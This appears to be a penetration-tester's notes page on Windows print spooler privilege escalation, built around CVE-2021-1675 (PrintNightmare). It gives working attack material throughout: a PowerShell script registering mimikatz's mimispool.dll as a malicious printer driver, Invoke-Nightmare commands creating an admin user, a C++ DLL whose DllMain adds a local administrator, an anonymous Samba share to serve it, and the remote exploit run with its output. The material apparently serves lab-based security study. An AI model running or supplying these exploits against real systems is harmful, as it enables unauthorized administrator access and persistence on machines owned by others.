Printer

Universal Printer

Create a Printer

$printerName     = 'Universal Priv Printer'
$system32        = $env:systemroot + '\system32'
$drivers         = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
 
Copy-Item -Force -Path ($system32 + '\mscms.dll')             -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll'   -Destination ($drivers  + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers  + '\W32X86\3\mimispool.dll')
 
Add-PrinterDriver -Name       'Generic / Text Only'
Add-Printer       -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
 
New-Item         -Path ($RegStartPrinter + '\CopyFiles')        | Out-Null
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Directory' -PropertyType 'String'      -Value 'x64\3'           | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String'      -Value 'W32X86\3'        | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Mango')  | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Directory' -PropertyType 'String'      -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Files'     -PropertyType 'MultiString' -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Module'    -PropertyType 'String'      -Value 'mimispool.dll'   | Out-Null

Execute the driver

$serverName  = 'dc.purple.lab'
$printerName = 'Universal Priv Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName

PrinterNightmare By Caleb Stewart and John Hammond:

Proper Guide => https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

CVE-2021-1675

upload /opt/invoke-nightmare/CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "Pwner" -NewPassword "Pwn123!"

PrinterNightmare By Cube0x0.

# impacket-rpcdump @10.10.10.149 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol

DLL

Cube0x0’s exploit for PrintNightmare works remotely with creds. First, I’ll need to build a Dll. I’ve walked through this in detail before for HackBack. I’ll follow a similar set of steps to create a C++ DLL project, and use the following source for my Dll:

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("cmd.exe /c net user 0xdf 0xdf0xdf /add");
        system("cmd.exe /c net localgroup administrators 0xdf /add");
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The DllMain function will be called for various reasons, one of which is when a process loads the DLL. In that case, the ul_reason_for_call will be DLL_PROCESS_ATTACH. So the DLL will be loaded, will execute these two system commands, and then be done. I’ll compile that and copy it back to my Parrot VM.

Samba

Cube0x0 has an example Samba config to allow for anonymous access on his GitHub page. It’s important that the user on the last line exists on your host. I updated mine to match a user I had configured with access to nothing.

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[share]
    comment = Samba
    path = /srv/smb/
    guest ok = yes
    read only = no
    browsable = yes
    force user = nobody

I’ll restart Samba to take the updated config:

sudo service smbd restart

It’s also important that that user can read from the SMB share, so I’ll set that directory to be owned by that user:

sudo chown -R nobody:root smb/
sudo chmod -R 777 smb/
ls -l smb/
total 12
-rwxrwxrwx 1 nobody root 10240 Jul  7 22:10 AddUserDll.dll

Impacket

I’ll clone the repo and rename it:

cd /opt/
git clone https://github.com/cube0x0/CVE-2021-1675
Cloning into 'CVE-2021-1675'...
remote: Enumerating objects: 159, done.
remote: Counting objects: 100% (159/159), done.
remote: Compressing objects: 100% (98/98), done.
remote: Total 159 (delta 55), reused 124 (delta 32), pack-reused 0
Receiving objects: 100% (159/159), 1.45 MiB | 7.37 MiB/s, done.
Resolving deltas: 100% (55/55), done.
mv CVE-2021-1675 SharpPrintNightmare
cd SharpPrintNightmare/

This exploit uses a modified version of Impacket. I’ll clone that into this directory:

git clone https://github.com/cube0x0/impacket
Cloning into 'impacket'...
remote: Enumerating objects: 19570, done.
remote: Counting objects: 100% (645/645), done.
remote: Compressing objects: 100% (304/304), done.
remote: Total 19570 (delta 386), reused 531 (delta 339), pack-reused 18925
Receiving objects: 100% (19570/19570), 6.82 MiB | 9.18 MiB/s, done.
Resolving deltas: 100% (14798/14798), done.

To avoid messing up my system install, I’ll create a virtual environment, activate it, and install Impacket in there.

Run Exploit

With all the pieces assembled, I can run the exploit. I’ll give it the creds for the hazard user which work for an RPC connection, as well as the path to the DLL on the SMB share:

(venv) shashwat@Kali-VM$ python3 CVE-2021-1675.py 'Domain/user:[email protected]' '\\10.10.xx.xx\share\AddUserDll.dll'
[*] Connecting to ncacn_np:10.xx.xx.xx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \\10.10.xx.xx\share\AddUserDll.dll
[*] Try 1...
[*] Stage0: 0
[*] Stage2: 0
[+] Exploit Completed

It worked!

PreviousEvaluating Vulnerable DriversNext$PATH interception

Last updated